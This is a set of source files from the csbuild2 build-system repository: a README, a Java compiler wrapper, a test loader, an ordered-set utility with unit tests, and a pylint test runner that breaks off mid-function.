"is_vendor": false, "language": "Markdown", "length_bytes": 4645, "license_type": "no_license", "max_line_length": 613, "num_lines": 41, "path": "/README.md", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "## **Current test status:**\n\n| **Platform** | **Status (develop)** |\n|:-------------|:--------------------:|\n| Linux | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_LinuxPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_LinuxPython3&branch_Csbuild=develop&guest=1) |\n| | |\n| macOS | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_MacOSPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_MacOSPython3&branch_Csbuild=develop&guest=1) |\n| | |\n| Windows | [![TeamCity](https://dev.aegresco.com/teamcity/app/rest/builds/buildType:(id:Csbuild_WindowsPython3),branch:(develop)/statusIcon)](https://dev.aegresco.com/teamcity/viewType.html?buildTypeId=Csbuild_WindowsPython3&branch_Csbuild=develop&guest=1) 
|\n\n---\n\nCSBuild is a language-agnostic build system focused on maximizing developer iteration time and providing tools for enabling developers to improve their build workflow. Currently, CSBuild is undergoing a complete rewrite to address some core architecture issues with the original iteration. It gets closer every day, but hasn't quite reached feature parity with the original CSBuild.\n\nWhat it currently can do:\n- Build basic C/C++, Java, Objective-C/C++, and Assembly files\n- Build on Windows, macOS, BSD, Linux, Android, Xbox 360, PS3, PS4, PS5, and PSVita systems (language support varies by system)\n- Be extended with tools to work in any language\n- Support macro processing in all strings (i.e., `csbuild.SetOutputDirectory(\"{toolchainName}/{architectureName}/{targetName}\")`)\n- Generate project files for Visual Studio from version 2010 up to 2022.\n- Dependency graph generation by running with --dg (requires the 'graphviz' Python package to be installed)\n \n <img src=\"doc_img/depends.gv.png\" alt=\"Dependency Graph\" style=\"zoom:50%;\" />\n\nWhat's still missing that exists in old CSBuild:\n- \"Chunking\" - intelligently combining multiple translation units into one and breaking them back apart to improve build turn-around\n- Solution generation for QtCreator\n- Build GUI showing the progress of individual files and projects as they're built\n- Build profiler to analyze and identify headers and lines of code that are expensive to compile\n\nThe core architecture is much more stable and maintainable than old CSBuild's, and tools are easier to implement than they were before. The new architecture also successfully decouples csbuild from the c++ language, allowing it to be truly versatile and language-agnostic. The new csbuild also cuts down considerably on wasted time during initial startup. Now that the majority of the core features have been implemented, we expect feature parity for the tools and target platforms supported by old CSBuild to start coming online very quickly, shortly followed by solution generation, chunking, and the GUI tools.\n\nDocumentation hasn't been created for the new version of csbuild yet; however, we have created a large suite of tests, so in the short term, a lot of information can be gleaned from looking at the make.py file in each test.\n\nCode for old csbuild, for those interested in it, can be found here: https://github.com/SleepingCatGames/csbuild\n\n---\n\n## Development Notes\n\nCurrently, the only dependency necessary for csbuild development is pylint, but that is only needed for running the pylint test. However, while functional test support is maintained for both Python 2 and Python 3, the pylint test is no longer run for Python 2 because it is no longer supported by pylint and its own dependencies." }, { "alpha_fraction": 0.6260115504264832, "alphanum_fraction": 0.6271676421165466, "avg_line_length": 31.641510009765625, "blob_id": "10e668901d2905b7a055dc514cbca95bbffbdfdc", "content_id": "26f1142c75e4eec6f0b5f0a5e8e5c5d4801bf613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3460, "license_type": "no_license", "max_line_length": 128, "num_lines": 106, "path": "/csbuild/tools/java_compilers/oracle_java_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: oracle_java_compiler\n\t:synopsis: Oracle-compatible Java compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport platform\nimport os\n\nfrom .java_compiler_base import JavaCompilerBase\n\ndef _ignore(_):\n\tpass\n\nclass OracleJavaCompiler(JavaCompilerBase):\n\t\"\"\"\n\tOracle-compatible Java compiler implementation.\n\t\"\"\"\n\n\tdef __init__(self, projectSettings):\n\t\tJavaCompilerBase.__init__(self, projectSettings)\n\n\t\tself._javaCompilerPath = os.path.join(self._javaBinPath, \"javac{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\t\tassert os.access(self._javaCompilerPath, os.X_OK), \"Oracle Java compiler not found at path: {}\".format(self._javaCompilerPath)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFiles, classRootPath):\n\t\t_ignore(project)\n\t\t_ignore(inputFiles)\n\n\t\toutputFiles = set()\n\n\t\t# Find each .class file in the intermediate directory.\n\t\tfor root, _, files in os.walk(classRootPath):\n\t\t\tfor filePath in files:\n\t\t\t\toutputFiles.add(os.path.join(root, filePath))\n\n\t\treturn tuple(sorted(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\tcmd = [self._javaCompilerPath] \\\n\t\t\t+ self._getClassPathArgs() \\\n\t\t\t+ self._getSourcePathArgs() \\\n\t\t\t+ self._getOutputPathArgs(classRootPath) \\\n\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\treturn [arg for arg in cmd if arg]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getClassPathArgs(self):\n\t\tif self._classPaths:\n\t\t\t# javac's path-list separator is platform-dependent: \";\" on Windows, \":\" elsewhere.\n\t\t\targ = os.pathsep.join(self._classPaths)\n\t\t\treturn [\n\t\t\t\t\"-classpath\",\n\t\t\t\targ,\n\t\t\t]\n\t\treturn []\n\n\tdef _getSourcePathArgs(self):\n\t\tif self._srcPaths:\n\t\t\t# Same platform-dependent separator as the class paths above.\n\t\t\targ = os.pathsep.join(self._srcPaths)\n\t\t\treturn [\n\t\t\t\t\"-sourcepath\",\n\t\t\t\targ,\n\t\t\t]\n\t\treturn []\n\n
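\t# For illustration (paths here are hypothetical), an assembled command resembles:\n\t#     javac -classpath libs/a.jar -sourcepath src -d <classRootPath> src/Foo.java\n\tdef _getOutputPathArgs(self, 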
classRootPath):\n\t\treturn [\n\t\t\t\"-d\",\n\t\t\tclassRootPath,\n\t\t]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.757328987121582, "alphanum_fraction": 0.7595005631446838, "avg_line_length": 42.85714340209961, "blob_id": "807801a97aabc1e1c0eb175c787cf8fd633820d6", "content_id": "58898487192a8a113f9bc20bf708be9a4f53ab3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1842, "license_type": "no_license", "max_line_length": 120, "num_lines": 42, "path": "/functional_tests/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: functional_tests\n\t:synopsis: Set of functional tests for csbuild, just contains directories with tests in it\n\t\tThis file only exists to perform test loading.\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\nimport os\nimport imp\n\ndef load_tests(loader, tests, _pattern): #pylint: disable=invalid-name\n\t\"\"\"Load tests\"\"\"\n\n\tfor testdir in os.listdir(\"functional_tests\"):\n\t\tif os.path.isdir(os.path.join(\"functional_tests\", testdir)):\n\t\t\tmodulepath = os.path.abspath(os.path.join(\"functional_tests\", testdir, \"tests.py\"))\n\t\t\tif os.access(modulepath, os.F_OK):\n\t\t\t\ttests.addTests(loader.loadTestsFromModule(imp.load_source(\"functional_tests.{}.tests\".format(testdir), modulepath)))\n\n\treturn tests\n" }, { "alpha_fraction": 0.7358916401863098, "alphanum_fraction": 0.7381489872932434, "avg_line_length": 21.149999618530273, "blob_id": "8f11e6782dd7d54d16574ef9429a739793fd1af5", "content_id": "53745b5bb2725cc2920239291936d43562cfba68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 443, "license_type": "no_license", "max_line_length": 69, "num_lines": 20, "path": "/functional_tests/cpp_features_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n#ifdef EXPLICIT_DEFINE\n# define EXPLICIT_DEFINE_MESSAGE \"Explicit define is present\"\n#else\n# define EXPLICIT_DEFINE_MESSAGE \"No explicit define\"\n#endif\n\n#ifdef IMPLICIT_DEFINE\n# define IMPLICIT_DEFINE_MESSAGE \"Implicit define is present\"\n#else\n# define IMPLICIT_DEFINE_MESSAGE \"No implicit define\"\n#endif\n\nint main()\n{\n\tint unused;\n\tprintf(\"%s\", EXPLICIT_DEFINE_MESSAGE \" - \" IMPLICIT_DEFINE_MESSAGE);\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6795483231544495, "alphanum_fraction": 0.6986198425292969, "avg_line_length": 26.67361068725586, "blob_id": "a8d3d7e6e0b62c8551e9852d7b22c44c6704fded", "content_id": "782e262b52b8795110ac8c1589a8945b711fb049", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7970, "license_type": "no_license", "max_line_length": 125, "num_lines": 288, "path": "/csbuild/_utils/ordered_set.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: ordered_set\n\t:synopsis: Provides a set implementation that keeps a strong order\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport collections\nfrom .._testing import testcase\n\n\nclass OrderedSet(object):\n\t\"\"\"\n\tAn ordered set that keeps a strong order - all items inserted into the set remain in the set in the order they were inserted\n\tMuch like (and in fact, implemented in terms of) collections.OrderedDict\n\n\tOther than that, semantics are identical to set. For details on this class's functions, see pylib docs for set.\n\n\t:param iterable: An iterable to insert elements into the set\n\t:type iterable: anything iterable\n\t\"\"\"\n\t# pylint: disable=invalid-name,missing-docstring\n\tdef __init__(self, iterable=None):\n\t\tself.map = collections.OrderedDict()\n\t\tif iterable is not None:\n\t\t\tself.map.update([( x, None ) for x in iterable])\n\n\tdef __len__(self):\n\t\treturn len(self.map)\n\n\tdef __contains__(self, key):\n\t\treturn key in self.map\n\n\tdef union(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.update(other)\n\t\treturn ret\n\n\tdef intersection(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.intersection_update(other)\n\t\treturn ret\n\n\tdef difference(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.difference_update(other)\n\t\treturn ret\n\n\tdef symmetric_difference(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.symmetric_difference_update(other)\n\t\treturn ret\n\n\tdef __and__(self, other):\n\t\treturn self.intersection(other)\n\n\tdef __or__(self, other):\n\t\treturn self.union(other)\n\n\tdef __sub__(self, other):\n\t\treturn self.difference(other)\n\n\tdef __xor__(self, other):\n\t\treturn self.symmetric_difference(other)\n\n\tdef __iter__(self):\n\t\tfor key in self.map.keys():\n\t\t\tyield key\n\n\tdef __reversed__(self):\n\t\tfor key in reversed(list(self.map.keys())):\n\t\t\tyield key\n\n\tdef __repr__(self):\n\t\treturn \"{{{}}}\".format(\", \".join([repr(key) for key in self.map.keys()]))\n\n\tdef update(self, iterable):\n\t\tself.map.update([( x, None ) for x in iterable])\n\n\tdef intersection_update(self, iterable):\n\t\tfor key in list(self.map.keys()):\n\t\t\tif key not in iterable:\n\t\t\t\tdel self.map[key]\n\n\tdef difference_update(self, iterable):\n\t\tfor key in iterable:\n\t\t\tif key in self.map:\n\t\t\t\tdel self.map[key]\n\n\tdef symmetric_difference_update(self, iterable):\n\t\tfor key in iterable:\n\t\t\tif key in self.map:\n\t\t\t\tdel self.map[key]\n\t\t\telse:\n\t\t\t\tself.map[key] = None\n\n\tdef add(self, key):\n\t\tself.map[key] = None\n\n\tdef remove(self, key):\n\t\tdel self.map[key]\n\n\tdef discard(self, key):\n\t\ttry:\n\t\t\tdel self.map[key]\n\t\texcept KeyError:\n\t\t\tpass\n\n\tdef pop(self):\n\t\t# Remove and return the oldest element; like set.pop, the removed element is returned.\n\t\tkey = list(self.map.keys())[0]\n\t\tdel self.map[key]\n\t\treturn key\n\n\tdef clear(self):\n\t\tself.map = collections.OrderedDict()\n
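\n# Usage sketch (illustrative values only): insertion order is preserved across mutation.\n#     s = OrderedSet([3, 1, 2])\n#     s.add(1)    # re-adding an existing element keeps its original position\n#     list(s)     # -> [3, 1, 2]\n\n\nclass TestOrderedSet(testcase.TestCase):\n\t\"\"\"Test the ordered set\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self):\n\t\t\"\"\" Set up the test \"\"\"\n\t\tself.testset = OrderedSet([1,2])\n\t\tself.testset.add(3)\n\t\tself.testset.add(4)\n\n\tdef testLen(self):\n\t\t\"\"\"Test len\"\"\"\n\t\tself.assertEqual(4, len(self.testset))\n\n\tdef testContains(self):\n\t\t\"\"\"test contains\"\"\"\n\t\tself.assertIn(1, self.testset)\n\t\tself.assertIn(2, self.testset)\n\t\tself.assertIn(3, self.testset)\n\t\tself.assertIn(4, 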
self.testset)\n\t\tself.assertNotIn(5, self.testset)\n\n\tdef testUnion(self):\n\t\t\"\"\"test union\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tunionset = self.testset.union(otherset)\n\t\tself.assertEqual(6, len(unionset))\n\t\tself.assertEqual(list(unionset), [1,2,3,4,6,5])\n\n\tdef testIntersection(self):\n\t\t\"\"\"test intersection\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tinterset = self.testset.intersection(otherset)\n\t\tself.assertEqual(2, len(interset))\n\t\tself.assertEqual(list(interset), [3,4])\n\n\tdef testDifference(self):\n\t\t\"\"\"test difference\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset.difference(otherset)\n\t\tself.assertEqual(2, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2])\n\n\tdef testSymmetricDifference(self):\n\t\t\"\"\"test symmetric difference\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset.symmetric_difference(otherset)\n\t\tself.assertEqual(4, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2,6,5])\n\n\tdef testAnd(self):\n\t\t\"\"\"test &\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tinterset = self.testset & otherset\n\t\tself.assertEqual(2, len(interset))\n\t\tself.assertEqual(list(interset), [3,4])\n\n\tdef testOr(self):\n\t\t\"\"\"test |\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tunionset = self.testset | otherset\n\t\tself.assertEqual(6, len(unionset))\n\t\tself.assertEqual(list(unionset), [1,2,3,4,6,5])\n\n\tdef testSub(self):\n\t\t\"\"\"test -\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset - otherset\n\t\tself.assertEqual(2, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2])\n\n\tdef testXor(self):\n\t\t\"\"\"test ^\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset ^ otherset\n\t\tself.assertEqual(4, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2,6,5])\n\n\tdef testIter(self):\n\t\t\"\"\"test iteration\"\"\"\n\t\ttestList = [1,2,3,4]\n\t\ti = 0\n\n\t\tfor item in self.testset:\n\t\t\tself.assertEqual(testList[i], item)\n\t\t\ti += 1\n\n\tdef testReversed(self):\n\t\t\"\"\"test reverse\"\"\"\n\t\tself.assertEqual([4,3,2,1], list(reversed(self.testset)))\n\n\tdef testUpdate(self):\n\t\t\"\"\"test update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.update(otherset)\n\t\tself.assertEqual(6, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,3,4,6,5])\n\n\tdef testIntersectionUpdate(self):\n\t\t\"\"\"test intersection update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.intersection_update(otherset)\n\t\tself.assertEqual(2, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [3,4])\n\n\tdef testDifferenceUpdate(self):\n\t\t\"\"\"test difference update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.difference_update(otherset)\n\t\tself.assertEqual(2, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2])\n\n\tdef testSymmetricDifferenceUpdate(self):\n\t\t\"\"\"test symmetric difference update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.symmetric_difference_update(otherset)\n\t\tself.assertEqual(4, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,6,5])\n\n\tdef testAdd(self):\n\t\t\"\"\"test add\"\"\"\n\t\tself.testset.add(5)\n\t\tself.testset.add(0)\n\t\tself.assertEqual(6, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,3,4,5,0])\n\n\tdef testRemove(self):\n\t\t\"\"\"test remove\"\"\"\n\t\tself.testset.remove(2)\n\t\tself.assertEqual(3, 
len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,3,4])\n\n\tdef testDiscard(self):\n\t\t\"\"\"test discard\"\"\"\n\t\tself.testset.discard(2)\n\t\tself.testset.discard(0)\n\t\tself.assertEqual(3, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,3,4])\n\n\tdef testPop(self):\n\t\t\"\"\"test pop\"\"\"\n\t\tself.testset.pop()\n\t\tself.assertEqual(3, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [2,3,4])\n\n\tdef testClear(self):\n\t\t\"\"\"test clear\"\"\"\n\t\tself.testset.clear()\n\t\tself.assertEqual(0, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [])\n" }, { "alpha_fraction": 0.6694461703300476, "alphanum_fraction": 0.672557532787323, "avg_line_length": 30.14341163635254, "blob_id": "42f5cbb97d9f3305d75c56e81f283a1bc7fef470", "content_id": "4033897f06071bd127a4d688c154b1ddfa006a17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8035, "license_type": "permissive", "max_line_length": 145, "num_lines": 258, "path": "/csbuild/_testing/pylint_test.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: pylint_test\n\t:synopsis: Run pylint as part of the unit test framework\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport traceback\nimport threading\nimport re\nimport unittest\n\nfrom . import testcase\nfrom .. 
import log\nfrom .._utils import thread_pool, PlatformString, queue, PlatformUnicode\n\nclass TestPylint(testcase.TestCase):\n\t\"\"\"Test to run pylint\"\"\"\n\t# pylint: disable=invalid-name\n\[email protected](sys.version_info.major < 3, \"Pylint is no longer supported on Python 2\")\n\tdef testPyLint(self):\n\t\t\"\"\"Run pylint on the code and ensure it passes all pylint checks\"\"\"\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = thread_pool.ThreadPool(multiprocessing.cpu_count(), callbackQueue, stopOnException=False)\n\n\t\tenv = dict(os.environ)\n\t\tenv[PlatformString('PYTHONPATH')] = os.pathsep.join(sys.path)\n\n\t\tfd = subprocess.Popen([sys.executable, \"csbuild/_testing/run_pylint.py\", \"--version\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\tout, err = fd.communicate()\n\t\tif err:\n\t\t\tlog.Error(err)\n\t\tif out:\n\t\t\tlog.Info(out)\n\n\t\tfailedLints = set()\n\t\tlock = threading.Lock()\n\n\t\tansiEscape = re.compile(r'\\x1b[^m]*m')\n\t\tdef _parseAndRejigger(module, data):\n\t\t\tout = []\n\t\t\tdata = PlatformUnicode(data)\n\t\t\tdata = ansiEscape.sub('', data)\n\t\t\tfor line in data.splitlines():\n\t\t\t\tmatch = re.match(R\".:\\s*(\\d+),\\s*\\d+: (.+)\", line)\n\t\t\t\tif not match:\n\t\t\t\t\tmatch = re.match(R\".+:(\\d+):\\d+: (.+)\", line)\n\t\t\t\tif match:\n\t\t\t\t\tout.append(' File \"{}\", line {}, in pylint\\n {}'.format(os.path.abspath(module), match.group(1), match.group(2)))\n\t\t\t\telse:\n\t\t\t\t\t# Recent versions of pylint annoyingly print these lines about the config file to stderr and while\n\t\t\t\t\t# there is an option internally to silence these messages, there is no switch available externally\n\t\t\t\t\t# for configuring it. This means we need to check for those messages manually and discard them.\n\t\t\t\t\tif not line.startswith(\"Using config file \") and line != \"No config file found, using default configuration\":\n\t\t\t\t\t\tout.append(line)\n\t\t\treturn \"\\n\".join(out) + \"\\n\" if out else \"\"\n\n\t\tdef _runPylint(module):\n\t\t\tlog.Info(\"Linting module {}\", module)\n\t\t\tmoduleFullPath = os.path.abspath(module)\n\t\t\tfd = subprocess.Popen([sys.executable, \"csbuild/_testing/run_pylint.py\", module], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\t\tout, err = fd.communicate()\n\t\t\tif err:\n\t\t\t\terr = _parseAndRejigger(moduleFullPath, err)\n\t\t\t\tif err:\n\t\t\t\t\tlog.Error(\"LINTING {}:\\n\\n{}\", module, PlatformString(err))\n\t\t\tif out:\n\t\t\t\tout = _parseAndRejigger(moduleFullPath, out)\n\t\t\t\tif out:\n\t\t\t\t\tlog.Error(\"LINTING {}:\\n\\n{}\", module, PlatformString(out))\n\t\t\tif fd.returncode != 0:\n\t\t\t\t#pylint: disable=not-context-manager\n\t\t\t\twith lock:\n\t\t\t\t\tfailedLints.add(module)\n\t\t\tself.assertEqual(0, fd.returncode)\n\n\t\tclass _sharedLocals(object):\n\t\t\tcount = 0\n\t\t\tdone = 0\n\n\t\tdef _checkDone():\n\t\t\t_sharedLocals.done += 1\n\t\t\tlog.Info(\"-- Completed {} out of {} lintings\", _sharedLocals.done, _sharedLocals.count)\n\t\t\tif _sharedLocals.count == _sharedLocals.done:\n\t\t\t\tpool.Stop()\n\n\t\tresultMTime = 0\n\t\tif os.access(\"failedLints.txt\", os.F_OK):\n\t\t\tresultMTime = os.path.getmtime(\"failedLints.txt\")\n\n\t\tfailedLints = set()\n\n\t\tif os.access(\"failedLints.txt\", os.F_OK):\n\t\t\twith open(\"failedLints.txt\", \"r\") as f:\n\t\t\t\tfailedLints = set(f.readlines())\n\n\n\t\timportRegex = re.compile(R\"import (.*)\")\n\t\tfromImportRegex = re.compile(R\"from (.*) 
import (.*)\")\n\t\tdotsRegex = re.compile(R\"(\\.+)(.*)\")\n\t\trelintMemo = {}\n\n\t\tdef _getModuleOrPackageInit(pkg):\n\t\t\tif os.access(pkg + \".py\", os.F_OK):\n\t\t\t\treturn pkg + \".py\"\n\n\t\t\tif not os.access(pkg, os.F_OK):\n\t\t\t\treturn None\n\n\t\t\tif os.path.isdir(pkg):\n\t\t\t\tpkg = os.path.join(pkg, \"__init__.py\")\n\t\t\t\tif not os.access(pkg, os.F_OK):\n\t\t\t\t\treturn None\n\t\t\treturn pkg\n\n\t\t# Ignore python virtual environments.\n\t\tfileDiscardRegex = re.compile(r\"venv[\\d\\s\\w]*[\\\\/]\", 0)\n\n\t\tdef _shouldRelint(filename):\n\t\t\tif fileDiscardRegex.match(filename):\n\t\t\t\treturn False\n\t\t\tif filename in failedLints:\n\t\t\t\treturn True\n\t\t\tif filename in relintMemo:\n\t\t\t\tshouldRelint = relintMemo[filename]\n\t\t\telse:\n\t\t\t\tshouldRelint = os.path.getmtime(filename) > resultMTime\n\t\t\t\trelintMemo[filename] = shouldRelint\n\n\t\t\tif shouldRelint:\n\t\t\t\treturn True\n\n\t\t\twith open(filename, \"r\") as f:\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tmatch = importRegex.match(line)\n\t\t\t\t\tpkg = None\n\t\t\t\t\tif match:\n\t\t\t\t\t\treplaced = match.group(1).replace(\".\", os.path.sep)\n\t\t\t\t\t\tpkg = _getModuleOrPackageInit(os.path.join(os.path.dirname(filename), replaced))\n\n\t\t\t\t\t\tif pkg is None:\n\t\t\t\t\t\t\tpkg = _getModuleOrPackageInit(replaced)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmatch = fromImportRegex.match(line)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tpkg = match.group(1)\n\t\t\t\t\t\t\tif pkg == \"__future__\":\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif pkg.startswith(\"csbuild\"):\n\t\t\t\t\t\t\t\tpkg = pkg.replace(\".\", os.sep)\n\t\t\t\t\t\t\telif pkg.startswith(\".\"):\n\t\t\t\t\t\t\t\tdotmatch = dotsRegex.match(pkg)\n\t\t\t\t\t\t\t\tstartDots = dotmatch.group(1)[1:]\n\t\t\t\t\t\t\t\tend = dotmatch.group(2).replace(\".\", os.sep)\n\t\t\t\t\t\t\t\tpkg = os.path.join(os.path.dirname(filename), startDots.replace(\".\", \"../\") + end)\n\t\t\t\t\t\t\tpkg = _getModuleOrPackageInit(os.path.normpath(pkg))\n\n\t\t\t\t\tif pkg is not None:\n\t\t\t\t\t\tif pkg in failedLints:\n\t\t\t\t\t\t\treturn resultMTime + 1\n\n\t\t\t\t\t\tif 